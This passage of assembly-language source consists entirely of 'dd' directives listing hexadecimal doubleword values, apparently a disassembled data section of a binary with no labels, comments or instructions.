		dd 96D381EAh, 4193830Ch, 75606587h, 0C22B21DAh,	97F7214Ch
		dd 0BD742A0Bh, 0FFC88931h, 76CAA3A3h, 1B45E85Bh, 0DA86EF77h
		dd 0CA9FB6FFh, 96746E6Eh, 1B80A76Ch, 445BB766h,	1E92276Dh
		dd 6FDC52EDh, 7A4ECAFFh, 0ECABD195h, 5F5E541Bh,	0D1A7036Bh
		dd 155A1C7Dh, 0E78282BAh, 576CEA4h, 1F29CDFDh, 5A8C0084h
		dd 0A56B2D2h, 78C94FF1h, 0C38F25Bh, 8AAD610Ah, 1F4A7E16h
		dd 0D494F08Fh, 0CE6D3262h, 29EC2A85h, 49EC7864h, 86A13FE3h
		dd 0FBD010A9h, 6EF12D9Fh, 59B72302h, 532A8E91h,	636F177Ch
		dd 290F86EBh, 290CDDEDh, 1EC44456h, 4EB223Dh, 3E92C67h
		dd 37DE58F5h, 0BE2A36h,	5B318D9Ah, 0A5CC90B3h, 33460207h
		dd 0D8E1928Ch, 709E303Dh, 0FC18A5ABh, 0F4B03C7Ch, 4E79773Ah
		dd 2D40A822h, 3338A4BFh, 0BF8B6D53h, 0DD8B8586h, 3E90DCC0h
		dd 1176009Fh, 0F777BB44h, 793CCF13h, 97B2E4B6h,	0ABCD292Ah
		dd 925D8F9h, 0AFE3687Ah, 3C4FF4E8h, 0C3FD9391h,	0EB9E9831h
		dd 227DE9F1h, 4DA61A89h, 7135E8EFh, 30F948A7h, 638320A4h
		dd 282FE940h, 322DB9A2h, 349D91FCh, 0E3E6BFAh, 0B0AC59E2h
		dd 8605355h, 0B2654C26h, 9D236F6Eh, 7B7E86FDh, 4842EB2Ch
		dd 6004BC7Ch, 2DF05704h, 753623E3h, 0CC4C6DE9h,	0D47C1D00h
		dd 629FBFCAh, 65EC6435h, 7D7CD8B3h, 0C4E568B3h,	13FC1D98h
		dd 2C4798D7h, 7F227E79h, 8F776139h, 1EEAE65Ah, 8D0CD5E6h
		dd 70C89C8h, 0DE0EBABBh, 0AC807B7Eh, 0FABBF3F0h, 0E18738EEh
		dd 20734600h, 0E3E807F7h, 0D78AE463h, 4581EDF2h, 0E00BAD3Dh
		dd 5FF33D90h, 0EFD9051Dh, 5F8F2630h, 0BEBE1A1Ah, 77FC1872h
		dd 5B5B0030h, 412758BFh, 4B730B0Ch, 26FC58A7h, 0AA34CACAh
		dd 5AB06CF4h, 7E52C7FEh, 344D2226h, 6F53C5C5h, 16FECC8Ch
		dd 1C691E2Fh, 447105ECh, 0BB899FA0h, 0A146C79Eh, 43B81417h
		dd 0AD8A2248h, 3C4D2A1Ah, 94CA5EBCh, 0DDEC4857h, 5027A3D5h
		dd 0C399E556h, 360C6866h, 0A97EDADAh, 1BF14D4Dh, 7130E9EEh
		dd 30FDEBA7h, 0DF110FA4h, 1ECED793h, 4ED646Bh, 0AED39DBEh
		dd 5B7E0E21h, 0DBE7AE86h, 508C3730h, 0F50F959Bh, 7AB46F4Eh
		dd 174FDED8h, 8EB06A6Ch, 0C35E5F0h, 0BEDA7077h,	61B1913h
		dd 0CCEC8C9Bh, 47691A39h, 0DD728FAAh, 64842430h, 0EF3EF5D1h
		dd 85AB6B42h, 0F53F0E9h, 0A8F30C4Dh, 28571E1Bh,	0A3FA83A1h
		dd 727B1701h, 0C30895D7h, 4A883D2Bh, 0FF30D6D9h, 8FBA7A4Ah
		dd 7021C0C4h, 83DD6657h, 3D7FE2F2h, 0ACFC9C8Bh,	5E622F6Ch
		dd 0FAE7AABEh, 48993E3Dh, 0A017AFA1h, 64B46505h, 1724DBD9h
		dd 92FA1B68h, 3566FAE7h, 0ABC46473h, 367D3373h,	0D0E68FA0h
		dd 55892D18h, 0EE1AA9A2h, 0CA34D5Bh, 3920D5F7h,	0A2A24F4Ah
		dd 645FECFCh, 90D96C4Fh, 1D451013h, 0BCF78384h,	62710427h
		dd 0CE02B7BCh, 78830023h, 0EA3DF6DDh, 0BECF6A4Eh, 30FEAF8h
		dd 0BBD96474h, 3546E5CAh, 0C4DB9399h, 64790C2Fh, 0CF0BA8A2h
		dd 6E9B0A23h, 0E010A3A5h, 1964A41h, 203DC0E2h, 0A0CC757Dh
		dd 174AE7E3h, 8DC4909Ch, 4B713770h, 0C2EB87B7h,	4C8D3406h
		dd 0F22CC789h, 7BBB6C4Fh, 123FC5DEh, 9AA65820h,	1244F7C4h
		dd 96C76A6Ch, 11C390Fh,	0D6D89E8Fh, 496C2831h, 0F015A199h
		dd 65872F31h, 0C536DBDCh, 82AE6028h, 0D50F3CDh,	9FC27A62h
		dd 2D41F216h, 0B8E49D86h, 5B652265h, 0E617B6BAh, 7A812627h
		dd 0ED0FF0BDh, 9CBA6354h, 834C3D0h, 82F41554h, 3345DEF7h
		dd 8FF8B58Dh, 3C740104h, 0C1E6AFAFh, 449A3B15h,	0E418A588h
		dd 47BC5951h, 1C3DE6AAh, 84B24C73h, 2D40EAECh, 0BFD45202h
		dd 306A1017h, 0DFCDD5D4h, 288A2928h, 0F81FBE9Ch, 3E904C5Ah
		dd 0F830FF83h, 979A2450h, 0C7DF3F7h, 84AE6F65h,	2367091Eh
		dd 0C9D28A82h, 526F1015h, 0D01DA0A1h, 70B84706h, 0E434FFCDh
		dd 93BF7C49h, 1F26EBF0h, 0ABD34111h, 3745ECC5h,	0A0F69EA2h
		dd 5D623969h, 0FE80ACB9h, 6D922221h, 0E700A897h, 6B9E527Bh
		dd 234AC3CAh, 92C96B70h, 3671E0EAh, 0CDC19192h,	347C0326h
		dd 0DFEEA581h, 51B45632h, 0ED06AC88h, 788F4F4Fh, 1138DBC7h
		dd 9CA14744h, 75CFCC7h,	0A0E40668h, 26780B3Bh, 0D3C98E9Fh
		dd 63023B32h, 0C50693A5h, 42823725h, 0E03ADAC4h, 0B9CC5B5Ah
		dd 0F4DD8EFh, 8CD77A6Fh, 2A46EEF2h, 0BAD28080h,	767E2866h
		dd 0DC1DBDABh, 798A1829h, 0E30ED4CAh, 0B2A07E31h, 1B11D3C2h
		dd 82F56173h, 234EECDBh, 0CAF19492h, 4D5D1A20h,	0D9C28E84h
		dd 6CF73638h, 0F0198AB2h, 68AE6857h, 93DCFC8h, 89AA724Ah
		dd 2B7A90FEh, 0BFC2734Ch, 30791326h, 0B7E28781h, 5BAF2F15h
		dd 0FF14B9A2h, 7C8D1634h, 0ED37C7C6h, 9CA44068h, 283CE1E5h
		dd 0BDDA5A7Eh, 3271070Eh, 0D3F1849Ch, 5E610D2Bh, 0D018B8A7h
		dd 16822721h, 0FB09CEF4h, 0ADB45944h, 1B30D2F6h, 85FA7F73h
		dd 2A58E9E9h, 0AAE8AAF7h, 5A66053Fh, 0FFE4B9B2h, 709D2224h
		dd 0D00996A5h, 50B0465Bh, 1822D5D3h, 0BBE91A7Dh, 3A45DECDh
		dd 0BED68B8Dh, 2E7A1172h, 0DBFB8196h, 529E3C3Bh, 0F702AACAh
		dd 7F835953h, 0A37C9AFh, 84B64E4Ah, 256EDF6h, 0A7AB626Ah
		dd 4868191Ch, 0DFFE899Fh, 4D6C2C5Fh, 0A101B4B9h, 769C2A0Ch
		dd 0F23FD8C5h, 8BA24569h, 521D4F9h, 0DDD6636Bh,	3552ECC8h
		dd 0B7FD9A86h, 757F0220h, 0CC13B7B5h, 7F95382Eh, 0FA03CAECh
		dd 6E9C3157h, 1D35C6D0h, 95F56272h, 586CE7ECh, 0AEEB95B5h
		dd 4A77001Dh, 0DFE190ADh, 629B2100h, 0E2078CC7h, 6DB24A5Fh
		dd 1A2BF8D8h, 81A85B7Bh, 247590F4h, 9BF74252h, 1344445h
		dd 0EA8CA4A5h, 46BC3C39h, 0D614BEA1h, 5DE43924h, 0F219D5D6h
		dd 91824B43h, 2644DDE1h, 0BECA590Bh, 3E470B2Ch,	0D3F5A689h
		dd 4A420616h, 0C02BD597h, 63891B2Eh, 0FF32DBEDh, 0BDA9684Bh
		dd 6AAD23A0h, 89E6DB38h, 0BC2A8685h, 0C4B8B475h, 3F656B01h
		dd 0C7D28D8Fh, 4F38DB54h, 0C6361648h, 5688755Ch, 0EADE58FBh
		dd 6ABE2A37h, 0C9CE8149h, 0CE942CA5h, 821FB7F1h, 1D0C68B2h
		dd 15FC684Dh, 99049A35h, 9E1E3357h, 7E6383E6h, 74C9E2A7h
		dd 63399504h, 0B5F86057h, 9C947B79h, 771AED86h,	2E6C2035h
		dd 0CB76C2D2h, 13831747h, 863BE3DFh, 0A9CE402Ah, 0FEBECDCFh
		dd 0DD843C82h, 0C5D8DADEh, 0C3A9DE39h, 6A7897E2h, 0BCFE5751h
		dd 17124D7Dh, 9E632A32h
		dd 0D1D53202h, 0A1B7F7F3h, 0C9C6929Ch, 0D7A38AB9h, 0CBA0E7C4h
		dd 0C1EC3B87h, 20006A1Dh, 0AEF86479h, 96714348h, 0F79ED13Ah
		dd 0FEC45453h, 0EDF2329Eh, 7BB91E1Ch, 0E0400404h, 0CEE48889h
		dd 88A16C6Ch, 5FC0D95Ch, 7FD43C4h, 0F8E54159h, 7CA84CA9h
		dd 3695E1ACh, 683D71CCh, 5BED0C0Ch, 7D39F993h, 4D5CC2F1h
		dd 32884E1h, 0F72E87D7h, 49BC191Bh, 0A75E2E43h,	0F9552E1Fh
		dd 0BDD05E85h, 0BFB8243Fh, 2B8344h, 0C89DF911h,	0D691316Ch
		dd 0AEB2C46Ah, 0B578AE38h, 9357D944h, 25176467h, 7866A88Dh
		dd 8CB3DF9Fh, 47F40B49h, 0EF680131h, 58D0F1B4h,	0B5AEE6D6h
		dd 0E4A05973h, 9B05CAA1h, 7F1D0DC1h, 0FA414FB4h, 993757E3h
		dd 643A969Eh, 0D5F6D983h, 0FCAD402Ah, 0BCA2F409h, 2E09DBEBh
		dd 28FCD3D3h, 14EA474Eh, 4C7740BBh, 0A04A04Bh, 6936FF3Bh
		dd 3540F357h, 5EEF0740h, 974E7DA2h, 635DA5E3h, 0F82E9BB1h
		dd 890DB124h, 8F54EC5Dh, 8ADBF7B0h, 4465AC30h, 656B3318h
		dd 5EE88C60h, 0CC49FD97h, 0FC1727F9h, 9E71778Ah, 0A0FC5566h
		dd 5758CFC0h, 80C48A79h, 4C7C5B38h, 6321E820h, 9F9CF3D0h
		dd 104870CCh, 461C9022h, 38D3EAEAh, 1C1A2BB0h, 64EE44D0h
		dd 92E6726Fh, 845090C9h, 0F672A327h, 85BF9A9Ah,	0DBB10F05h
		dd 4F20E82Bh, 5469F2F2h, 3439494Ch, 23F62B53h, 19EF4E6Fh
		dd 8C0AECBDh, 0FED32BD8h, 2514F4A2h, 76464215h,	561CA4A2h
		dd 5E1333C9h, 3C116C69h, 0ADE98EB1h, 49F73802h,	0D468C4C5h
		dd 0F74EC86Ah, 0EF4D9981h, 0B0B4EA98h, 5A5BDBDFh, 87A60203h
		dd 633DC18Bh, 498BE7E5h, 18D283CFh, 5BF595CCh, 1900294Bh
		dd 0EA813AE1h, 0A5997624h, 10AE68C0h, 8EAE3A25h, 9A54BDFEh
		dd 700610B8h, 0BD06524Ah, 0F42A9083h, 98B3032Dh, 885CBD2Eh
		dd 3AE3872Ch, 9E1A8FF4h, 8FE642BAh, 279D5D3h, 3C0E08A4h
		dd 0B90E5A42h, 0AB82D418h, 3987B04Fh, 59F03EC9h, 51D80418h
		dd 59833359h, 25E01929h, 64B08C8Fh, 8BA38BF4h, 5569FCFAh
		dd 0AA64E3D4h, 35FAC3DAh, 496FC8F9h, 8E0DC46Ah,	82D9A26Eh
		dd 0E0C42021h, 62376317h, 0EE948606h, 0C75B690Dh, 3E80EBD5h
		dd 2D025EBFh, 0D554EE51h, 2C6605B5h, 0C217FCE6h, 38470A5Ch
		dd 253EDD5Dh, 0B6E3C025h, 1C73D080h, 0EE56660Ch, 0E536656h
		dd 17F9D718h, 0F3EF4B4Ch, 8D61BD0Fh, 0AD840EB0h, 0F748F5EAh
		dd 0E4BA16B3h, 0FB254F0Bh, 4E90F6C7h, 3D126EF7h, 43F1C0DDh
		dd 2DCD6FF8h, 95694943h, 27D19539h, 476E8A8Bh, 98A47A3Fh
		dd 6398EFE5h, 50DB7623h, 2C3A890Bh, 0C6F99C9Ch,	59FC25DAh
		dd 0E95EE2F7h, 0F1A38628h, 3B67BDB2h, 0F3C90235h, 996E7A60h
		dd 0E883629Fh, 1BE24D7Ch, 56C4A0BFh, 3107636Bh,	0CA0EBA91h
		dd 728D2724h, 58CB45BAh, 7ED11D01h, 5D72D45Fh, 1B329ADBh
		dd 22AB6A8h, 0C69FF89Fh, 6F5E3AEEh, 7914228Dh, 93F4607Ch
		dd 0A17DB257h, 0CAEA6535h, 241BF6F3h, 7D414B4Bh, 5B01A18Dh
		dd 3187FB78h, 713DBFE7h, 344B1CE5h, 16EE38D5h, 5A94C8CAh
		dd 0FC460B6h, 7E52AE47h, 1D447C22h, 630889E9h, 0E5E8BA8Ch
		dd 0FD957A49h, 0BBA0DCA7h, 0A388A45Ch, 0A145E195h, 9663E1B6h
		dd 866A86F4h, 0C8F2BCA1h, 0EE439CACh, 0DD833F38h, 0D84E8008h
		dd 3C98F4E7h, 6270EF2h,	0F5B432DAh, 72862909h, 0DE3EDBDCh
		dd 69A6485Ah, 3E2BC2C7h, 97D57B72h, 8A1E89F0h, 3DCD3477h
		dd 0DF913CB6h, 0B2C48AE1h, 49A504ACh, 2DDC48DFh, 0B1DC0827h
		dd 7B4EAABBh, 138C1992h, 6CB6F6Eh, 9FA38EAFh, 451A7676h
		dd 0FF01438Fh, 0CECDF058h, 7FDAAB62h, 3C71CDBAh, 0D6568283h
		dd 0B9B234Ch, 5710010Dh, 0FDDB800Bh, 54E6FD75h,	3A9B3075h
		dd 320762C6h, 8511D5BCh, 41EC4848h, 1FA1B1D1h, 0FCE1018Fh
		dd 0E448FE2Bh, 7C3E035Dh, 541AB6B2h, 0F7A77571h, 0D98E6B5Bh
		dd 0A27E2DDEh, 1F9E0300h, 2799C4A9h, 4E90505h, 5B0E3257h
		dd 16EE1A2Bh, 6C01BE38h, 331FF00h, 19174359h, 0BB1A2560h
		dd 26FD0CDCh, 0A2EFACCAh, 7956770h, 13C650FCh, 19C6120Eh
		dd 633994D5h, 0D564B68Ah, 0FF107B79h, 0CF1CF3A2h, 2A6C7F6Eh
		dd 0F676D2D3h, 3FC8D0BAh, 0D10DB787h, 0D327BFD5h, 28CA9DACh
		dd 56771333h, 8324FBD1h, 48B9877Fh, 281702Dh, 0AAD38BE9h
		dd 1A89CC8Eh, 0FC06ECDAh, 0F2343746h, 5AE54FFDh, 9730331Bh
		dd 0AB2DD3ADh, 0C4BCAE77h, 3D5D6BD8h, 33B16A31h, 6D73A756h
		dd 0A9DF4FCFh, 83DD090Ah, 4CFA909Ah, 9FC22E2Fh,	5780BA12h
		dd 0E9A83434h, 752B4CC3h, 0C90EE6E9h, 18FFA3A3h, 0DDC7470Fh
		dd 99E57172h, 0B367F439h, 9F9A7627h, 6957C99Ah,	0DAB00C64h
		dd 0C8DC28FEh, 0C0A5E489h, 18F9F19Bh, 2B85D6E7h, 18DD5C32h
		dd 84A0433Fh, 22D15ABh,	43C0285Eh, 88B82424h, 32BED86h
		dd 0A90806A9h, 0B0105C40h, 9EB2995Ah, 22159052h, 930D9394h
		dd 29E7A3C8h, 0FDC5A899h, 0EA8F2B57h, 5D585A05h, 9F97FE53h
		dd 722BC18Ch, 2075E6D6h, 27CD7500h, 0AA5C4E40h,	86B3E0Eh
		dd 0B2C14F94h, 7AC71308h, 0D1B1AAC6h, 0D69D3943h, 7D3A28F1h
		dd 29B91066h, 2F355157h, 92305E58h, 3F474676h, 7DBE137Ah
		dd 0E4BBAEA6h, 3D139EADh, 8FE44143h, 7D29117Dh,	3BCAF6C5h
		dd 726A4FDh, 0D95A18DBh, 79C86474h, 0E306A1AEh,	41ED5756h
		dd 182CCDD6h, 0C88E2B74h, 7543E7EEh, 9FA1CCD0h,	7A402329h
		dd 0C7C5BEAEh, 4A9C2724h, 0F90484BCh, 65B1484Fh, 2024C9FEh
		dd 98B17A73h, 1253F1FBh, 0B2C15659h, 7781D05h, 0CAEB8989h
		dd 4D51012Eh, 0FA1EAEA2h, 62942737h, 0F631F2E9h, 9AAA504Dh
		dd 551CAF6h, 87C86E64h,	2045F42Ch, 0A5E49396h, 52661735h
		dd 0FB1EBBB1h, 719A3F0Ah, 0F609CED2h, 8E924B55h, 122FCED2h
		dd 8CD06174h, 1A70FBE9h, 0C9EA8993h, 6857223Eh,	0EAD19EB7h
		dd 429F1F0Fh, 0FB1BABB7h, 5187435Eh, 1629C7C3h,	0A89C6F6Ah
		dd 3B41FDFAh, 0B5F0766Ch, 2C700606h, 0CECEBB89h, 5A91362Ah
		dd 0CF70BEA9h, 68844D5Eh, 0F33AF9C5h, 0F2CA2450h, 653BC796h
		dd 0A5DE0A09h, 27480514h, 0D6E781C0h, 406A0C13h, 0CD11FAB5h
		dd 5BEB2821h, 0A816FAF0h, 8BB1494Bh, 229ECF7h, 9AE5471Bh
		dd 184BA5D1h, 0E5D5BEB9h, 4A671C4Fh, 0A1B3A9A8h, 1DF3A71Ah
		dd 1138C1C1h, 32F8D2D9h, 1ACF60A6h, 0E7BD290Ch,	761D1974h
		dd 2563FECEh, 2A44056Eh, 523268FAh, 7CFA667Ch, 0ED42F465h
		dd 345E5D16h, 5E24B051h, 0C3359DACh, 14BC93A3h,	0B20F5104h
		dd 4998F4DDh, 358FDBC0h, 1D296ADBh, 0E6FD2AD1h,	0ECA9CFBEh
		dd 6758044Dh, 879A5E6h,	23FABB7h, 0DCB20F0Ah, 76B07ED6h
		dd 2B97C3DFh, 350A66EFh, 0BDD55D54h, 70BF4B7Ch,	726FD7BEh
		dd 0CFF879A4h, 563B20A3h, 95CF121Eh, 572D8160h,	89D9A8FBh
		dd 715E2A40h, 0AD111FE1h, 29F76378h, 0FF7DB106h, 6F34683Bh
		dd 85B15552h, 0DCEAC48Bh, 2BF41590h, 3977FC01h,	441A767Eh
		dd 0E8CFAEBBh, 6DD10814h, 63718181h, 3EC85DD5h,	78175AB2h
		dd 4644DADAh, 660CB468h, 0D8AE0F62h, 0DEDD287Ch, 0BEA4DCCEh
		dd 31076E8Ah, 0F63D89D5h, 44A91E01h, 0DD1BE6E9h, 4872D6Eh
		dd 5E6F490Ah, 0E0B0FB12h, 1B768684h, 95C8ABB8h,	0ACF03D6Ah
		dd 0ACB1F634h, 4FA59963h, 0FB37C1A8h, 3D95D34h,	891DE7A7h
		dd 0D895EB8Fh, 0A4C90E8Ch, 43F3DC8Bh, 713A8DE7h, 2F0569E5h
		dd 4CFB677Fh, 83059BCAh, 5AE03C3Dh, 0BC751FFh, 0FC5110Eh
		dd 53135901h, 0D5A0EF07h
		dd 1B4B7A79h, 89A3BEA9h, 624F1B71h, 0E0E02ED2h,	0FBE87469h
		dd 865AB6BDh, 8ABD5A5Dh, 0D34F2F5h, 22E30F4Eh, 600D5B14h
		dd 261D7DF4h, 390B574Ch, 0FBF054EBh, 92F07C54h,	0BE4E493Ah
		dd 952A6032h, 73778FE5h, 0E5BE7E84h, 0EDA08989h, 0CBAFE2A3h
		dd 0E3AFE336h, 5984D0CEh, 0DC08A1A9h, 32EC02A1h, 8DC081Ah
		dd 0DDEB29FCh, 0EDC12D3Fh, 4050051Ch, 86F70334h, 4570771Ch
		dd 0B88E80BBh, 0BF00DB5Ch, 9D41E12Fh, 7ABE80C4h, 15DB3F91h
		dd 0A6C91506h, 0D2B19EF2h, 0D99F2BAFh, 1C722829h, 2A6BA2A1h
		dd 32374F86h, 78EC2A8Eh, 0D1EC7865h, 0BA70443Eh, 92392D2Eh
		dd 90BB5F52h, 0D1A56E9Eh, 18AF4185h, 919CC8EDh,	0D23C343Fh
		dd 527E2F87h, 0AB8D596h, 0C630C2F3h, 4E310169h,	0B0B4585Ah
		dd 0D9AB569Eh, 349DB8Dh, 3C9FE834h, 0C4D08C8Dh,	0B4B9F0A9h
		dd 728A3D0Eh, 1CE303F9h, 0BD10D72h, 2F02FEFEh, 0A1977372h
		dd 4F0C006Bh, 40530837h, 482F5754h, 0CE8E052Dh,	2E08882Bh
		dd 0E925D2D2h, 43A81209h, 0CA1F99FEh, 6D312A66h, 6B71B1DDh
		dd 0DDB41CE7h, 36FD081h, 0A2CF8191h, 77691D0Bh,	3C818ADAh
		dd 1BC16694h, 71D6322Ch, 68D6021Eh, 7348A46Ch, 1ABB7D41h
		dd 6802931Ch, 193571FCh, 0B3135F70h, 81A8265Fh,	74AA0255h
		dd 0BD8F5338h, 0CC5E390Ah, 94DA26A0h, 0BDC22E00h, 3634FBC6h
		dd 0D2AA6C56h, 96E4F776h, 4777F401h, 19BDDFA3h,	9E72FEDAh
		dd 988D4A36h, 7C57B3A7h, 0C5E64FB2h, 68317199h,	89E70C0Ch
		dd 7E683C31h, 8CD1DFC3h, 0A6F76428h, 0A64AFA96h, 18EA21D9h
		dd 3ED2BBBCh, 0FDE23699h, 0DDF82CF8h, 0AB82438h, 0AAD4760Ah
		dd 0C89DF511h, 75593B6Ch, 0FAC79096h, 6CB9157Ch, 0D2F23CC4h
		dd 80DA061Bh, 4DC8A769h, 79BF1B1Eh, 5D328BE6h, 3B108C01h
		dd 1B18446Bh, 99435B6Bh, 72155969h, 1990343Ah, 3CCEF383h
		dd 0FB5BB0B0h, 0F1C72133h, 65AA7A14h, 0BEF90908h, 49207D7Bh
		dd 903F7B12h, 0EB846150h, 0A277D243h, 7E3ECD16h, 12A3EAB8h
		dd 0F9FF07E6h, 191B5E18h, 0CD3D791Dh, 0C4D78482h, 0C4AADA9Ch
		dd 8A8E8B83h, 0AA4FFB7Dh, 91DB3B4Eh, 0BF446A45h, 94286333h
		dd 7479891Ch, 62B3D89Dh, 592F8A03h, 47ADBD76h, 0B0248F70h
		dd 82A64466h, 0DA7C9356h, 966BF7E6h, 8B43A51h, 0E9AFAEC7h
		dd 0EEF333E5h, 6EC96A11h, 0D3A86581h, 0D391EB77h, 0B9BECA48h
		dd 7F534D37h, 0B3C65A2Fh, 0D1634273h, 851831BAh, 4B462728h
		dd 690EBA5Eh, 0AA5905BCh, 26DB7F89h, 0C196F266h, 0BDEF4E3Bh
		dd 582FF3ECh, 29C27BDEh, 5EDD31BDh, 4FD31F10h, 87144AA3h
		dd 7634EAEAh, 561CA838h, 0DDF6FA90h, 6E116D6Dh,	6E1620B3h
		dd 0ACF6627Fh, 197CE081h, 36EB78ADh, 0CF42F9AAh, 0CF849717h
		dd 56D34E9Bh, 0C2A74800h, 90B773Eh, 92CFECE4h, 271FDA52h
		dd 0CA782C0Dh, 1DC77B34h, 0D05834Eh, 0C2E4DB99h, 65277F96h
		dd 0F98B0A09h, 6401054Dh, 87B3C1CEh, 1E234744h,	0DB5DACECh
		dd 1F986267h, 0C614F6F3h, 5872C0Ch, 5D687A0Bh, 73729311h
		dd 38298583h, 96CCA7F6h, 14CFFF96h, 260BDCECh, 1DC35A7Dh
		dd 8B86C1ABh, 53D5FD5Fh, 754AA34Eh, 83983F19h, 0A5678C81h
		dd 0FD891B6Bh, 4CD1F271h, 0DB8C08B4h, 25FA565Fh, 0B8B47544h
		dd 59883B0Ch, 51903851h, 2F412011h, 0D7BAC7EDh,	0D49A2AF9h
		dd 522FDCFBh, 378FEBDBh, 1D2CA0D3h, 0CABAFBD1h,	41B11244h
		dd 0A9E42049h, 0F4F2819h, 0FB10E59Bh, 693FF085h, 4F15AD7Fh
		dd 6C65FE43h, 0DD6A7613h, 57832E83h, 0F9F8392Dh, 8C1630B7h
		dd 305FDADAh, 0CFCA6D88h, 0E48A3AE9h, 0A0AA2D7Bh, 35CC4210h
		dd 0D3EDFFBh, 0DF3960E1h, 23F76341h, 0A501EFB2h, 0F8DC384Ch
		dd 4A62C33Eh, 127C9D1Eh, 5F34A0BEh, 54601277h, 442A56D3h
		dd 0B78CE8E8h, 701DE9Dh, 7571CDFDh, 0F11BBE48h,	815270EFh
		dd 0DD3690A8h, 996A98A7h, 0E883069Fh, 0B4DAFD7Ch, 0BE2F74E0h
		dd 0B48E6362h, 0A449E5D6h, 0E9BA4822h, 0B972E72Fh, 0F411A82Dh
		dd 6E44041Bh, 0B0773812h, 329ECD4h, 0C6F4F99Dh,	6FCF6B6Ah
		dd 87704822h, 0E6775060h, 0A3E2CD3Dh, 8AD93531h, 467BA022h
		dd 0E333971Ah, 0D631BDBCh, 0FE93EC6Ah, 2B442372h, 2177B4E5h
		dd 26CB7B4Dh, 96923149h, 0BE43CB9h, 8152C4AFh, 0C0F52697h
		dd 72AD6B94h, 56AB372Bh, 0CC118581h, 0BB90EF05h, 1E18DAD6h
		dd 6846D1E2h, 43B98746h, 0D75EDCE6h, 0C8CA9CD5h, 0FEBF9CACh
		dd 0DD8324FAh, 0D4294204h, 0C398F731h, 0B382AE54h, 0A94DE9C5h
		dd 73A11D1Ch, 8E6DBEA0h, 4540CE62h, 0F6479388h,	9B3E19D7h
		dd 0D12D898Ah, 0FBAFD879h, 7599AD6Fh, 0D1D758DAh, 0F1C45355h
		dd 679E04C4h, 8D55D9CDh, 7B7E9A83h, 55FD5694h, 60348B5Dh
		dd 13A4D137h, 0A4ED8781h, 88AB6D60h, 253C5B6Ch,	64778679h
		dd 5C6976A2h, 0C1E1BDABh, 0BD192632h, 641459F3h, 86958ADBh
		dd 0B54C170Ah, 3CDDEE84h, 40066F19h, 99325E09h,	14F80AC2h
		dd 0CED3AAF9h, 2526D266h, 0EA7F6183h, 0E1872308h, 10A1DF46h
		dd 4F15F4DCh, 3A0F6BD3h, 9C421DEDh, 2FDA6763h, 0A348F2EDh
		dd 4FAD7B16h, 727C9DAh,	87D7347Ah, 563CE2EBh, 0A8CD3C23h
		dd 247A1200h, 0D7FB96C5h, 52947A65h, 0B654BABEh, 40957312h
		dd 0E3FC1DDh, 9EAF0C43h, 1116FAF2h, 0BC932764h,	683D4A44h
		dd 0CFF5849Bh, 0E355D37h, 0C61FB7BAh, 22D4312Dh, 0FF2FC497h
		dd 0DAF34F46h, 0F33F2FEh, 0ED8E626Ah, 7F1BBDA3h, 0A2EB939Dh
		dd 3B320D0Ah, 228051D0h, 2BC156C0h, 0D2D0FBFh, 0AE2436DBh
		dd 4CC9ADD1h, 8BC95C63h, 0D3ED7EFCh, 0D02D7702h, 8E135F5Fh
		dd 0B46C62DEh, 0CD8DFAA7h, 0E345F947h, 99AB2CDh, 0A4907489h
		dd 0A28023C0h, 8840C8D5h, 3A562F4Bh, 451B755Ah,	0B88DB181h
		dd 0DAE8075Ch, 0EA8D3132h, 0B68CA62h, 0E578384h, 3AE12713h
		dd 5B0114D7h, 5D14FFF1h, 4C5DF2A7h, 0E720447Ch,	0C0F46454h
		dd 69F11573h, 0A56042A1h, 8B6F9543h, 0CE0DA5D3h, 11790D68h
		dd 98841266h, 750785F1h, 0BCC1C553h, 4F3E5080h,	0DB82E202h
		dd 0ABC8B2BAh, 0C0E205C5h, 5DA0607h, 3D14ED94h,	0D78D6F1Ch
		dd 5D60CDDDh, 30802A75h, 7F188B8Ch, 0B5C7B2AEh,	77C04B2Dh
		dd 0EE6F9B83h, 5FA30335h, 0FA5BB0E0h, 0E38DD62h, 5469136Bh
		dd 0E5460938h, 0B6DEE393h, 81916512h, 6C4B2837h, 5C5057DCh
		dd 43D7B9B9h, 8812EDFBh, 63137AFh, 2F15A362h, 5ABA2323h
		dd 0AED77A93h, 90C9A6C8h, 31896627h, 99802425h,	0E1DCA695h
		dd 0B6B3F3Fh, 0FE28CECAh, 62A17796h, 0EBC1818h,	0A6D075D3h
		dd 0CCA1FD15h, 0D2952D70h, 0B2B6CBDAh, 24F867BFh, 0A594A3C8h
		dd 39FD8FB0h, 0F534AC9Dh, 0BD7E9F02h, 6036A2A2h, 7D410F70h
		dd 0AFE38789h, 0B98EEBF9h, 613FDC3Bh, 97F6C08Ah, 9AE64242h
		dd 5A5B88EBh, 0A6F0A64Eh, 91BB95DFh, 2CB10D0Dh,	6E24963Ch
		dd 4499F2F2h, 3409658Eh, 0A527942Eh, 190FCE44h,	0F2E1BCBDh
		dd 0DEF30F10h, 0A5C2AD82h, 0BB91515h, 0A9D37520h, 0C95778F5h
		dd 7E9A6D6Dh, 0BFC954E8h, 25859378h, 918304F6h,	4C52FF3Bh
		dd 52C820BAh, 3C02C2Dh,	0A1CC72D9h, 0D0A6ADEAh,	6484FE74h
		dd 0B58BD7D7h, 18CE71C7h, 671E24CCh, 89ECC0C0h,	8055B13Eh
		dd 0C2EB91AFh, 3BB097A6h, 3F700935h, 0B5DE802Ch, 0F712929Ch
		dd 30060245h, 0F5865F34h, 98FF3D44h, 0B84DB90Ch, 0EAAA2F2Ch
		dd 6D456C27h, 7A454511h, 50CA8432h, 9BC45305h, 0AA3F653Bh
		dd 0AB025B51h, 94954F4Fh
		dd 6F9A5A51h, 0E708DCCBh, 0FE105959h, 0ADBE1553h, 5C71019Bh
		dd 448ABDD5h, 40152EF6h, 93C124E4h, 5DA7677h, 13448340h
		dd 8F542B76h, 7D619D89h, 9CCC6A18h, 6A7D1A90h, 57BA4407h
		dd 0CC1D211Bh, 8ABFC46Eh, 25405F5Eh, 932493D0h,	306C2796h
		dd 0DD5B3AD2h, 0C7CB95AAh, 653F9BABh, 234E9A8Ah, 6C907E7Fh
		dd 3D97C3C3h, 5260BF3h,	0B7C927D9h, 0E5EF7B7Ch,	0BD4A702Bh
		dd 0F459BD31h, 0FF479393h, 0D48A0583h, 3D7FD888h, 0CD2A04FBh
		dd 0C2125E5Eh, 80A88574h, 2542AC54h, 6A69F5F6h,	37F7F5ACh
		dd 85FB27ABh, 13C12D30h, 6F049325h, 44585503h, 442A5A28h
		dd 878B4D6Bh, 0EAFF5B6Bh, 9C71CD25h, 0F8E1D40h,	0ABBB5F33h
